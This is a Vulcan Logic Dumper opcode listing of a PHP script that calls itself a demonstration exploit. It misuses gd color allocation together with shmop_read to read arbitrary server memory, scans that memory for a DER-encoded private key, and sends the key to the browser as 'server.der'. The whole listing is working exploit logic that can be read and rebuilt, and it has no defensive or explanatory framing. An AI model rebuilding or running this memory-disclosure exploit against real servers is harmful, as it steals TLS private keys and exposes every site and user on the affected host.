Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 47) Position 1 = 5, Position 2 = 10
Branch analysis from position: 5
2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 12
Branch analysis from position: 11
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 12
1 jumps found. (Code = 42) Position 1 = 67
Branch analysis from position: 67
2 jumps found. (Code = 44) Position 1 = 68, Position 2 = 16
Branch analysis from position: 68
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 16
2 jumps found. (Code = 46) Position 1 = 28, Position 2 = 30
Branch analysis from position: 28
2 jumps found. (Code = 43) Position 1 = 31, Position 2 = 66
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 66
Branch analysis from position: 39
2 jumps found. (Code = 43) Position 1 = 65, Position 2 = 66
Branch analysis from position: 65
1 jumps found. (Code = 42) Position 1 = 68
Branch analysis from position: 68
Branch analysis from position: 66
2 jumps found. (Code = 44) Position 1 = 68, Position 2 = 16
Branch analysis from position: 68
Branch analysis from position: 16
Branch analysis from position: 66
Branch analysis from position: 66
Branch analysis from position: 30
Branch analysis from position: 10
filename: /in/DTl4j
function name: (null)
number of ops: 76
compiled vars: !0 = $offset, !1 = $data, !2 = $position, !3 = $length, !4 = $keydata
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
17 0 E > INIT_FCALL 'extension_loaded'
1 SEND_VAL 'gd'
2 DO_ICALL $5
3 BOOL_NOT ~6 $5
4 > JMPNZ_EX ~6 ~6, ->10
5 > INIT_FCALL 'extension_loaded'
6 SEND_VAL 'shmop'
7 DO_ICALL $7
8 BOOL_NOT ~8 $7
9 BOOL ~6 ~8
10 > > JMPZ ~6, ->12
18 11 > > EXIT 'This+demonstration+exploit+only+works+with+ext%2Fgd+and+ext%2Fshmop+loaded.'
40 12 > INIT_FCALL 'init'
13 DO_FCALL 0
42 14 ASSIGN !0, 134578176
44 15 > JMP ->67
46 16 > INIT_FCALL 'peek'
17 SEND_VAR !0
18 SEND_VAL 1040
19 DO_FCALL 0 $11
20 ASSIGN !1, $11
48 21 INIT_FCALL 'strpos'
22 SEND_VAR !1
23 SEND_VAL '0%82'
24 DO_ICALL $13
25 ASSIGN !2, $13
49 26 TYPE_CHECK 1018 ~15 !2
27 > JMPZ_EX ~15 ~15, ->30
28 > IS_SMALLER ~16 !2, 1024
29 BOOL ~15 ~16
30 > > JMPZ ~15, ->66
51 31 > INIT_FCALL 'substr'
32 SEND_VAR !1
33 ADD ~17 !2, 4
34 SEND_VAL ~17
35 SEND_VAL 4
36 DO_ICALL $18
37 IS_EQUAL $18, '%02%01%00%02'
38 > JMPZ ~19, ->66
52 39 > INIT_FCALL 'ord'
40 ADD ~20 !2, 2
41 FETCH_DIM_R ~21 !1, ~20
42 SEND_VAL ~21
43 DO_ICALL $22
44 MUL ~23 $22, 256
45 INIT_FCALL 'ord'
46 ADD ~24 !2, 3
47 FETCH_DIM_R ~25 !1, ~24
48 SEND_VAL ~25
49 DO_ICALL $26
50 ADD ~27 ~23, $26
51 ADD ~28 ~27, 4
52 ASSIGN !3, ~28
53 53 INIT_FCALL 'peek'
54 ADD ~30 !0, !2
55 SEND_VAL ~30
56 SEND_VAR !3
57 DO_FCALL 0 $31
58 ASSIGN !4, $31
55 59 INIT_FCALL 'strpos'
60 SEND_VAR !4
61 SEND_VAL '%01%00%01'
62 DO_ICALL $33
63 IS_SMALLER 0, $33
64 > JMPZ ~34, ->66
56 65 > > JMP ->68
59 66 > ASSIGN_OP 1 !0, 1024
44 67 > > JMPNZ 1, ->16
62 68 > INIT_FCALL 'header'
69 SEND_VAL 'Content-type%3A+application%2Foctet-stream'
70 DO_ICALL
63 71 INIT_FCALL 'header'
72 SEND_VAL 'Content-Disposition%3A+attachment%3B+filename%3D%22server.der%22'
73 DO_ICALL
64 74 ECHO !4
65 75 > RETURN 1
Function init:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/DTl4j
function name: init
number of ops: 19
compiled vars: !0 = $rid
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
23 0 E > BIND_GLOBAL !0, 'rid'
25 1 INIT_FCALL_BY_NAME 'imagecreate'
2 SEND_VAL_EX 10
3 SEND_VAL_EX 10
4 DO_FCALL 0 $1
5 ASSIGN !0, $1
26 6 INIT_FCALL_BY_NAME 'imagecolorallocate'
7 SEND_VAR_EX !0
8 SEND_VAL_EX 0
9 SEND_VAL_EX 0
10 SEND_VAL_EX 0
11 DO_FCALL 0
27 12 INIT_FCALL_BY_NAME 'imagecolorallocate'
13 SEND_VAR_EX !0
14 SEND_VAL_EX 0
15 SEND_VAL_EX 0
16 SEND_VAL_EX 0
17 DO_FCALL 0
28 18 > RETURN null
End of function init
Function peek:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/DTl4j
function name: peek
number of ops: 31
compiled vars: !0 = $addr, !1 = $size, !2 = $rid
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
30 0 E > RECV !0
1 RECV !1
32 2 BIND_GLOBAL !2, 'rid'
33 3 INIT_FCALL_BY_NAME 'imagecolordeallocate'
4 SEND_VAR_EX !2
5 SEND_VAL_EX 0
6 DO_FCALL 0
34 7 INIT_FCALL_BY_NAME 'imagecolordeallocate'
8 SEND_VAR_EX !2
9 SEND_VAL_EX 1
10 DO_FCALL 0
35 11 INIT_FCALL_BY_NAME 'imagecolorallocate'
12 SEND_VAR_EX !2
13 SEND_VAR_EX !0
14 SEND_VAL_EX 0
15 SEND_VAL_EX 0
16 DO_FCALL 0
36 17 INIT_FCALL_BY_NAME 'imagecolorallocate'
18 SEND_VAR_EX !2
19 SEND_VAR_EX !1
20 SEND_VAL_EX 0
21 SEND_VAL_EX 0
22 DO_FCALL 0
37 23 INIT_FCALL_BY_NAME 'shmop_read'
24 CAST 4 ~7 !2
25 SEND_VAL_EX ~7
26 SEND_VAL_EX 0
27 SEND_VAR_EX !1
28 DO_FCALL 0 $8
29 > RETURN $8
38 30* > RETURN null
End of function peek
Generated using Vulcan Logic Dumper, using php 8.0.0